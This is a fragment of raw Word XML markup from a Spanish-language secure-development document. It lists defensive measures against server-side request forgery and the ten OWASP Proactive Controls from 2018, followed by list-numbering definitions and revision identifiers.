    <w:p w14:paraId="5BB767FE" w14:textId="77777777" w:rsidR="00882B11" w:rsidRDefault="003922B7" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cumplir el esquema de URL, puerto y destino con una la lista positiva de ítem permitidos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E70B78" w14:textId="77777777" w:rsidR="00882B11" w:rsidRDefault="003922B7" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>No enviar respuestas en formato crudo a los clientes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0326A6A7" w14:textId="08F9E348" w:rsidR="00C77E42" w:rsidRPr="00882B11" w:rsidRDefault="003922B7" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Deshabilite las redirecciones HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E91D88" w14:textId="77777777" w:rsidR="00882B11" w:rsidRDefault="003922B7" w:rsidP="00C77E42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C77E42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Controles </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C77E42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pro-activos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C77E42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E74615A" w14:textId="77777777" w:rsidR="00882B11" w:rsidRDefault="003922B7" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C1 – Definir requisitos de seguridad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590498B9" w14:textId="77777777" w:rsidR="00882B11" w:rsidRDefault="003922B7" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C2 - Hacer uso de librerías y marcos de trabajo de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212B09A8" w14:textId="77777777" w:rsidR="00882B11" w:rsidRDefault="003922B7" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C3 – Acceso seguro a bases de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F01AAB5" w14:textId="77777777" w:rsidR="00882B11" w:rsidRDefault="003922B7" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C4 – Encodear y escapar datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BD0DEF" w14:textId="77777777" w:rsidR="00882B11" w:rsidRDefault="003922B7" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C5 – Validar todas las entradas de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409EB3B7" w14:textId="77777777" w:rsidR="00882B11" w:rsidRDefault="003922B7" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C6 – Implementar identidad digital.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1230D592" w14:textId="77777777" w:rsidR="00882B11" w:rsidRDefault="003922B7" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C7 – Implementar controles de acceso adecuados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E299F1F" w14:textId="77777777" w:rsidR="00882B11" w:rsidRDefault="003922B7" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">C8 </w:t>
      </w:r>
      <w:r w:rsidR="00C77E42" w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>– Proteger</w:t>
      </w:r>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> los datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ED1FB2" w14:textId="77777777" w:rsidR="00882B11" w:rsidRDefault="003922B7" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">C9 – Implementar </w:t>
      </w:r>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>el</w:t>
      </w:r>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> registro y monitoreo de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03432934" w14:textId="7C5221F1" w:rsidR="003922B7" w:rsidRPr="00882B11" w:rsidRDefault="003922B7" w:rsidP="00882B11">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882B11">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C10 – Manejo de errores y excepciones</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003922B7" w:rsidRPr="00882B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3EB7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5E44CA7A"/>
    <w:lvl w:ilvl="0" w:tplc="080A0001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="108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732BB2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="063A2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267EA5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CAF6C26A"/>
    <w:lvl w:ilvl="0" w:tplc="70E0D9BC">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A8B1A48"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="719865A0"/>
    <w:lvl w:ilvl="0" w:tplc="6A966DA2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="643" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="080A0003">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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="13E26BF7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6A7A36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6197A85"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D3E2F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A283567"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39F86AE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1A333D3A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="144AA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5C752F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7B29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7D4DFD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51D0FFBC"/>
    <w:lvl w:ilvl="0" w:tplc="70E0D9BC">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1E8E7277"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C3CB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31122F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7CAC5BEC"/>
    <w:lvl w:ilvl="0" w:tplc="70E0D9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40B1B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="96443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B45F9F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3FB8C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B57977"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="26F041D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2C5735E5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF54B0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D654E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2FD2E5AE"/>
    <w:lvl w:ilvl="0" w:tplc="080A0001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="108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03">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2E414181"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF9272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E7866AB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B6F0A53E"/>
    <w:lvl w:ilvl="0" w:tplc="08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D813465"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D186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161255"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D4C7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6E86A02"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34447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0A1F53"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4D8B12C"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="47A1421B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76147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89D79E1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8E5CF3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41580E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7F8449E"/>
    <w:lvl w:ilvl="0" w:tplc="08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E891E3C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="52F29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F70CB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CDFAA9AE"/>
    <w:lvl w:ilvl="0" w:tplc="564E69EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CF84AC1A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:color w:val="auto"/>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1A60306"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3EE080C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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="51AD1061"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="957C1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30663F2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6010D9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6652F1C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F0905F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9985F1E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C8CAAE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5C707459"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B09AB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3513B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A38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ECA257B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DDF8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16A5B80"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F5892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2DF5D87"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E3230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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6480572F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA24D3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99706D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5F4E97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6A5871D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E4C5C1A"/>
    <w:lvl w:ilvl="0" w:tplc="C19C18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296461E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD8E5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4176992"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="81E21CE4"/>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43" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="75FE5098"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5552A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9667FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="61D6BC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795623AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A98E3B02"/>
    <w:lvl w:ilvl="0" w:tplc="080A0001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1127" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="080A0003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="767" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="080A0003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="080A0001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2207" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="080A0003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2927" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="080A0005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3647" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="080A0001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4367" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="080A0003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5087" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="080A0005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5807" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="46" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="79A040F9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8AE86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CA62E9C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B78E544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48" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7D767B14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDA41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5963461">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="236676231">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="837378818">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="781876153">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="97992354">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="402681431">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="247546313">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1325084975">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="350834880">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="530923359">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2091851065">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="749810658">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1569536989">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1328168963">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="998771931">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="751435925">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1111242799">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1878009264">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1182161821">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1514877773">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="288828926">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="685864447">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1934509695">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="553976114">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1725332169">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="594097891">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="865947220">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="274752955">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1427533536">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="2110881393">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1843281235">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="2145584673">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="234822733">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1659268411">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1576167054">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1217624809">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="484974559">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="789476764">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1015183916">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1028063307">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="1413115032">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="921110506">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1734741853">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="81144292">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="829717186">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1278947915">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="26570115">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="362950478">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="10059817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5A"/>
    <w:rsid w:val="000340F3"/>
    <w:rsid w:val="000E77E4"/>
    <w:rsid w:val="00125191"/>
    <w:rsid w:val="00143A95"/>
    <w:rsid w:val="001C0B45"/>
    <w:rsid w:val="00213245"/>
    <w:rsid w:val="00216C84"/>
    <w:rsid w:val="00282E16"/>
    <w:rsid w:val="002D4430"/>
    <w:rsid w:val="00302CCB"/>
    <w:rsid w:val="0034038B"/>
    <w:rsid w:val="00347556"/>
    <w:rsid w:val="00365A38"/>
    <w:rsid w:val="003922B7"/>
    <w:rsid w:val="003A59BE"/>
    <w:rsid w:val="00436253"/>
    <w:rsid w:val="00457D74"/>
    <w:rsid w:val="004C0118"/>
    <w:rsid w:val="004C0DD7"/>
    <w:rsid w:val="004C318E"/>
    <w:rsid w:val="004C753C"/>
    <w:rsid w:val="005004D4"/>
    <w:rsid w:val="00526003"/>
    <w:rsid w:val="00530B5A"/>
    <w:rsid w:val="0056249C"/>
    <w:rsid w:val="00585F71"/>
    <w:rsid w:val="00587577"/>
    <w:rsid w:val="005A007D"/>
    <w:rsid w:val="005D2F8D"/>
    <w:rsid w:val="005D7170"/>
    <w:rsid w:val="005F0F15"/>
    <w:rsid w:val="0061675C"/>
    <w:rsid w:val="00661B3D"/>
    <w:rsid w:val="00690BA4"/>
    <w:rsid w:val="0069318F"/>
    <w:rsid w:val="00694B2A"/>
    <w:rsid w:val="0069657D"/>
    <w:rsid w:val="006C1C13"/>
    <w:rsid w:val="00712564"/>
    <w:rsid w:val="00736A26"/>
    <w:rsid w:val="0079276A"/>
    <w:rsid w:val="007A6A2D"/>
    <w:rsid w:val="007F34D8"/>
    <w:rsid w:val="00816078"/>
    <w:rsid w:val="00821A15"/>
    <w:rsid w:val="00826953"/>
    <w:rsid w:val="00830124"/>
    <w:rsid w:val="00882B11"/>
    <w:rsid w:val="00924758"/>
    <w:rsid w:val="00932F5F"/>
    <w:rsid w:val="0096040C"/>
    <w:rsid w:val="00986EC5"/>
    <w:rsid w:val="009A5028"/>
    <w:rsid w:val="009A7F7C"/>
    <w:rsid w:val="009E0158"/>
    <w:rsid w:val="00A165BF"/>
    <w:rsid w:val="00A50CE9"/>
    <w:rsid w:val="00AE18AA"/>
    <w:rsid w:val="00AF6C8A"/>
    <w:rsid w:val="00B01F42"/>
    <w:rsid w:val="00B13BE3"/>
    <w:rsid w:val="00B32D7D"/>
    <w:rsid w:val="00B50F62"/>
    <w:rsid w:val="00B5508C"/>
    <w:rsid w:val="00B808FC"/>
    <w:rsid w:val="00BA754D"/>
    <w:rsid w:val="00BB115D"/>
    <w:rsid w:val="00C30E0B"/>
    <w:rsid w:val="00C77E42"/>
    <w:rsid w:val="00CC6DCE"/>
    <w:rsid w:val="00CE472F"/>
    <w:rsid w:val="00D213B2"/>
    <w:rsid w:val="00D33E51"/>
    <w:rsid w:val="00D97A08"/>
    <w:rsid w:val="00DB2687"/>
    <w:rsid w:val="00DE2A69"/>
    <w:rsid w:val="00DE53EC"/>
